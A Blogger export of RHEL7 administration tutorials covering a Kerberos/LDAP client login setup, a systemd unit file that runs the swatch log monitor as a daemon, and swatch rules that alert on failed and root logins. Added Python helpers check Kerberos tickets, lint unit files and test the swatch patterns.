<br />
Valid starting Expires Service principal<br />
06/06/2015 10:51:37 06/07/2015 10:51:37 krbtgt/MYCOMPANY.COM@MYCOMPANY.COM<br />
renew until 06/06/2015 10:51:37<br />
<br />
[root@server2 ~]# <b>kdestroy</b><br />
<br />
<br />
7) Create the home directory on first login (if it does not exist).<br />
[root@server2 ~]# <b>authconfig --enablemkhomedir --update</b><br />
<br />
8) Verify configuration changes<b> </b><br />
[root@server2 ~]# <b>authconfig --test</b><br />
<br />
9) <span style="color: black;">Comment out the entry for user 'katrina' in '/etc/passwd', if one exists; with 'passwd: files sss' in /etc/nsswitch.conf a local entry would be found before the LDAP one.</span><br />
<br />
10) Run the below command to verify that user information retrieval from LDAP server is working.<br />
[root@server2 ~]# <b>getent passwd katrina</b><br />
katrina:x:1002:1002::/home/katrina:/bin/bash<br />
<br />
11) Log in as user 'katrina' and enter password as given for user principal 'katrina' in the Kerberos database.<br />
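<br />
Two checks worth scripting after steps 6 and 9, as an added Python example (not from this post and not part of any Kerberos tool): parsing klist output to confirm that the cache holds an unexpired TGT for the expected realm, and detecting a local /etc/passwd entry that, with 'passwd: files sss' in nsswitch.conf, would take precedence over the LDAP identity. The klist text is reconstructed from the output shown above; the nsswitch.conf and passwd fragments are constructed.<br />

```python
import re
from datetime import datetime

# Reconstructed from the klist output shown above (constructed text, not a live capture).
KLIST_OUTPUT = """\
Ticket cache: KEYRING:persistent:0:0
Default principal: katrina@MYCOMPANY.COM

Valid starting       Expires              Service principal
06/06/2015 10:51:37  06/07/2015 10:51:37  krbtgt/MYCOMPANY.COM@MYCOMPANY.COM
\trenew until 06/06/2015 10:51:37
"""

# Constructed fragments of /etc/nsswitch.conf (as authconfig writes it) and /etc/passwd.
NSSWITCH_CONF = "passwd:     files sss\nshadow:     files sss\ngroup:      files sss\n"
PASSWD = "root:x:0:0:root:/root:/bin/bash\nkatrina:x:1001:1001::/home/katrina:/bin/bash\n"

TIME_FMT = "%m/%d/%Y %H:%M:%S"
TICKET_RE = re.compile(
    r"^(\d\d/\d\d/\d{4} \d\d:\d\d:\d\d)\s+(\d\d/\d\d/\d{4} \d\d:\d\d:\d\d)\s+(\S+)$"
)


def parse_klist(text):
    """Return the default principal and the (start, expiry, service) tickets in the cache."""
    info = {"principal": None, "tickets": []}
    for line in text.splitlines():
        m = re.match(r"Default principal:\s+(\S+)", line)
        if m:
            info["principal"] = m.group(1)
            continue
        m = TICKET_RE.match(line)
        if m:
            info["tickets"].append((datetime.strptime(m.group(1), TIME_FMT),
                                    datetime.strptime(m.group(2), TIME_FMT),
                                    m.group(3)))
    return info


def tgt_valid(klist, realm, now):
    """True when the cache belongs to a principal of `realm` and holds an unexpired TGT for it.
    `now` is a datetime or a string in klist's own MM/DD/YYYY HH:MM:SS format."""
    if isinstance(now, str):
        now = datetime.strptime(now, TIME_FMT)
    principal = klist["principal"] or ""
    if not principal.endswith("@" + realm):
        return False
    tgt = f"krbtgt/{realm}@{realm}"
    return any(svc == tgt and start <= now < end for start, end, svc in klist["tickets"])


def locally_shadowed(nsswitch, passwd, user):
    """True when `user` has an /etc/passwd entry and nsswitch consults 'files' before 'sss':
    the local entry (UID, home directory, shell) then answers lookups instead of the LDAP one."""
    sources = []
    for line in nsswitch.splitlines():
        m = re.match(r"passwd:\s*(.*)", line)
        if m:
            sources = m.group(1).split()
    files_first = "files" in sources and (
        "sss" not in sources or sources.index("files") < sources.index("sss"))
    local = any(l.split(":")[0] == user for l in passwd.splitlines() if l.strip())
    return files_first and local
```

The expiry check is also a cheap way to catch the clock-skew problem noted at the top of this post: if the client clock is wrong, the TGT's validity window will not contain the client's idea of "now".<br />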
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com1tag:blogger.com,1999:blog-1164086323266606043.post-52907751156710914272015-06-04T18:01:00.000+05:302015-06-21T21:35:29.639+05:30Create Custom Unit File (to run a Custom Daemon) in systemd in RHEL7<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In a previous post we configured Swatch Log Monitoring Tool. In this post we will configure swatch as a custom daemon in 'systemd' by creating a custom unit file in 'systemd' and loading it into 'systemd'.<br />
<br />
<br />
Perform the following steps:<br />
<br />
1) Create a unit file in /etc/systemd/system/ directory.<br />
[root@meru ~]# <b>touch /etc/systemd/system/swatch.service</b><br />
<br />
[root@meru ~]# <b>chmod 664 /etc/systemd/system/swatch.service</b><br />
<br />
<br />
2) Edit the Unit File.<br />
<b>[root@meru ~]# vi /etc/systemd/system/swatch.service</b><br />
<br />
<b>[Unit]</b><br />
<b>Description=Swatch Log Monitoring Daemon</b><br />
<b>After=syslog.target network.target auditd.service sshd.service</b><br />
<b><br /></b>
<b>[Service]</b><br />
<b>ExecStart=/bin/swatch --config-file=/etc/swatch/secure.conf --tail-file=/var/log/secure --pid-file=/var/run/swatch.pid --daemon</b><br />
<b># systemd runs ExecStop directly, not through a shell, so $(cat ...) would never be expanded;</b><br />
<b># $MAINPID is the PID that systemd read from PIDFile.</b><br />
<b>ExecStop=/bin/kill -s KILL $MAINPID</b><br />
<b>Type=forking</b><br />
<b>PIDFile=/var/run/swatch.pid</b><br />
<b><br /></b>
<b>[Install]</b><br />
<b>WantedBy=multi-user.target</b><br />
<br />
<br />
<div class="para">
Where:
</div>
<div class="itemizedlist">
<ul>
<li class="listitem"><div class="para">
<em class="replaceable">Description</em> is an informative description that is displayed in journal log files and in the output of the <code class="command">systemctl status</code> command. </div>
<div class="para">
</div>
</li>
<li class="listitem"><div class="para">
<i>After</i> ensures that this service is started only after the listed units (a space-separated list of services or targets) have been started; it orders them but does not itself activate them.</div>
<div class="para">
</div>
</li>
<li class="listitem"><div class="para">
<em class="replaceable">ExecStart</em> stands for the path to the actual service executable. </div>
<div class="para">
</div>
</li>
<li class="listitem"><div class="para">
<i>Type=forking</i> is used for daemons that make the fork system call and let the parent exit. The main process of the service is the one whose PID is written to <em class="replaceable">PIDFile</em>. </div>
<div class="para">
</div>
</li>
<li class="listitem"><div class="para">
<i>WantedBy</i> states the target or
targets that the service should be started under.
</div>
</li>
</ul>
</div>
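<br />
A lint for the pitfalls the list above describes, as an added Python example (not part of this post and not a systemd tool): Exec lines must name an absolute path and are not run through a shell, so $(...) substitution never happens; Type=forking should carry a PIDFile; and [Install] needs a WantedBy. Both unit texts are constructed: one stops the daemon with shell command substitution, the other with systemd's own $MAINPID variable.<br />

```python
import configparser
import re

# Constructed unit texts: the first stops the daemon with shell command substitution,
# the second with systemd's own $MAINPID variable.
BROKEN_UNIT = """\
[Unit]
Description=Swatch Log Monitoring Daemon
After=syslog.target network.target auditd.service sshd.service

[Service]
ExecStart=/bin/swatch --config-file=/etc/swatch/secure.conf --tail-file=/var/log/secure --pid-file=/var/run/swatch.pid --daemon
ExecStop=kill -s KILL $(cat /var/run/swatch.pid)
Type=forking
PIDFile=/var/run/swatch.pid

[Install]
WantedBy=multi-user.target
"""

FIXED_UNIT = BROKEN_UNIT.replace(
    "ExecStop=kill -s KILL $(cat /var/run/swatch.pid)",
    "ExecStop=/bin/kill -s KILL $MAINPID",
)

EXEC_PREFIXES = "-@:+!"  # characters systemd allows in front of an Exec command


def parse_unit(text):
    """Parse a unit file into {section: {key: value}}; keys keep their case."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return {section: dict(cp[section]) for section in cp.sections()}


def lint_unit(text):
    """Return a list of problems; an empty list means the unit passes these checks."""
    unit = parse_unit(text)
    service = unit.get("Service", {})
    problems = []
    for key, value in service.items():
        if not key.startswith("Exec"):
            continue
        words = value.lstrip(EXEC_PREFIXES).split()
        command = words[0] if words else ""
        if not command.startswith("/"):
            problems.append(f"{key}: '{command}' is not an absolute path (RHEL7's systemd requires one)")
        if re.search(r"\$\(|`|\|", value):
            problems.append(f"{key}: shell syntax is not interpreted; systemd runs the command directly")
    if service.get("Type") == "forking" and "PIDFile" not in service:
        problems.append("Type=forking without PIDFile: systemd has to guess the main process")
    if "WantedBy" not in unit.get("Install", {}):
        problems.append("[Install] has no WantedBy: systemctl enable will create no link")
    return problems
```

Running lint_unit on the first text reports two problems on ExecStop (relative path, shell substitution); the corrected text reports none. Note that with Type=forking and a PIDFile, systemd can stop the service with its default SIGTERM even without an ExecStop line.<br />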
<br />
<br />
3) Notify systemd about the new swatch.service file.<br />
[root@meru system]# <b>systemctl daemon-reload</b><br />
<br />
4) Start Swatch service<br />
[root@meru system]# <b>systemctl start swatch.service</b><br />
<br />
You can now use all systemctl commands for swatch.service. </div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com1tag:blogger.com,1999:blog-1164086323266606043.post-11611110765687790612015-06-04T10:12:00.000+05:302015-06-21T21:36:17.123+05:30Log Monitoring using Swatch in RHEL7<div dir="ltr" style="text-align: left;" trbidi="on">
The Simple WATCHer is a log monitoring tool that constantly searches log files and alerts system administrators of anything that matches the patterns described in the configuration file.<br />
<br />
It’s an efficient way to monitor system events like failed login attempts, installation of new packages, etc. <br />
<br />
Swatch uses two required fields:
<br />
<ul>
<li><span style="color: red;">Pattern</span>: A regular expression to search in the log file. </li>
<li><span style="color: red;">Action</span>: The action to perform for a pattern match, like output the log entry to the console, send an email, or execute a script.</li>
</ul>
Consider the following example:<br />
<br />
[root@server1 ~]# <b>vi /etc/swatch/secure.conf</b><br />
<b>watchfor /ssh.*: session opened for user/</b><br />
<b>echo bold</b><br />
<b>mail=root@server1.mycompany.com, subject="Successful SSH Login"</b><br />
<br />
<br />
[root@server1 ~]# <b>swatch --config-file=/etc/swatch/secure.conf --tail-file=/var/log/secure --daemon</b><br />
<br />
In the above example, Swatch will search the /var/log/secure log file continuously for the regular expression defined in the /etc/swatch/secure.conf config file and will output the log entry to the console on every successful SSH login and also mail the log entry to root@server1.mycompany.com. <br />
<br />
The <b>--daemon</b> option makes Swatch run as a daemon (background process).<br />
<br />
<br />
Perform the following steps:<br />
<br />
1) Install EPEL Repository <br />
[root@server1 ~]# <b>yum install epel-release</b><br />
<br />
2) Install packages<br />
[root@server1 ~]# <b>yum install swatch</b><br />
<br />
3)<b> </b>Create config directory and configuration files<br />
[root@server1 ~]# <b>mkdir /etc/swatch</b><br />
<br />
3.1) Monitor <span style="color: red;">failed login attempts, successful root logins, failed SSH login attempts, successful SSH root login</span>, in the /var/log/secure log file.<br />
[root@server1 ~]# <b>vi /etc/swatch/secure.conf</b><br />
<br />
<b>watchfor /FAILED/</b><br />
<b>echo bold</b><br />
<b>mail=root@</b><b>server1.mycompany.com, subject="Failed Login Attempt"</b><br />
<br />
<b>watchfor /ROOT LOGIN/</b><br />
<b>echo bold</b><br />
<b>mail=root@</b><b>server1.mycompany.com, subject="Successful Root Login"</b><br />
<br />
<b>watchfor /ssh.*: Failed password/</b><br />
<b>echo bold</b><br />
<b>mail=root@</b><b><b>server1</b>.mycompany.com, subject="Failed SSH Login Attempt"</b><br />
<br />
<b>watchfor /ssh.*: session opened for user root/</b><br />
<b>echo bold</b><br />
<b>mail=root@server1.mycompany.com, subject="Successful SSH Root Login"</b><br />
<br />
<br />
3.2) Monitor <span style="color: red;">installation of packages</span> in /var/log/messages log file.<br />
[root@server1 ~]# <b>vi /etc/swatch/messages.conf</b><br />
<br />
<b>watchfor /Installed/</b><br />
<b>echo bold</b><br />
<b>mail=root@</b><b><b>server1</b>.mycompany.com, subject="Installed New Package"</b><br />
<br />
<br />
<br />
4) Execute Swatch<br />
[root@server1 ~]# <b>swatch --config-file=/etc/swatch/secure.conf --tail-file=/var/log/secure --daemon</b><br />
<br />
[root@server1 ~]# <b>swatch --config-file=/etc/swatch/messages.conf --tail-file=/var/log/messages --daemon</b><br />
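<br />
To test the patterns before pointing swatch at a live log, here is an added Python example (not swatch itself and not from this post) that parses watchfor/echo/mail blocks in the layout used in step 3.1 and applies them to a few constructed /var/log/secure lines, stopping at the first matching block as swatch does unless a block ends with its <b>continue</b> action. The parser handles only this page's directives, and the log lines are constructed.<br />

```python
import re

# The secure.conf from step 3.1, embedded so the example runs offline.
SECURE_CONF = """\
watchfor /FAILED/
echo bold
mail=root@server1.mycompany.com, subject="Failed Login Attempt"

watchfor /ROOT LOGIN/
echo bold
mail=root@server1.mycompany.com, subject="Successful Root Login"

watchfor /ssh.*: Failed password/
echo bold
mail=root@server1.mycompany.com, subject="Failed SSH Login Attempt"

watchfor /ssh.*: session opened for user root/
echo bold
mail=root@server1.mycompany.com, subject="Successful SSH Root Login"
"""

# Constructed /var/log/secure lines (not captured from a real host; RFC 5737 addresses).
SAMPLE_LOG = [
    "Jun  4 09:12:01 server1 sshd[2345]: Failed password for invalid user admin from 192.0.2.10 port 51234 ssh2",
    "Jun  4 09:13:40 server1 sshd[2350]: pam_unix(sshd:session): session opened for user root by (uid=0)",
    "Jun  4 09:14:02 server1 login: FAILED LOGIN 1 FROM tty1 FOR shabbir, Authentication failure",
    "Jun  4 09:15:10 server1 login: ROOT LOGIN ON tty1",
    "Jun  4 09:16:00 server1 sshd[2360]: Accepted publickey for katrina from 192.0.2.20 port 51300 ssh2",
]


def parse_config(text):
    """Parse watchfor / echo / mail blocks as written in this post.
    Returns a list of {'pattern': compiled regex, 'echo': mode, 'mail': (address, subject)}."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = re.match(r"watchfor\s+/(.*)/$", line)
        if m:
            rules.append({"pattern": re.compile(m.group(1)), "echo": None, "mail": None})
            continue
        if not rules:
            raise ValueError(f"action before any watchfor: {line}")
        m = re.match(r"echo(?:\s+(\S+))?$", line)
        if m:
            rules[-1]["echo"] = m.group(1) or "plain"
            continue
        m = re.match(r'mail=(\S+?),\s*subject="([^"]*)"$', line)
        if m:
            rules[-1]["mail"] = (m.group(1), m.group(2))
            continue
        raise ValueError(f"unrecognised directive: {line}")
    return rules


def scan(lines, rules):
    """Apply the rules to each line; the first matching block wins and the next line is read."""
    alerts = []
    for line in lines:
        for rule in rules:
            if rule["pattern"].search(line):
                address, subject = rule["mail"] if rule["mail"] else (None, None)
                alerts.append({"subject": subject, "to": address,
                               "echo": rule["echo"], "line": line})
                break
    return alerts
```

On the constructed lines the scan yields four alerts, one per block, and the successful public-key login matches nothing; the first line shows why pattern order matters, since "Failed password" is matched by the SSH block and not by the case-sensitive /FAILED/ block.<br />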
<br />
<br />
In this post we have manually started swatch. In the
next post we will configure swatch as a custom daemon in 'systemd' by
creating a custom unit file in 'systemd' and loading it into 'systemd'.<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com2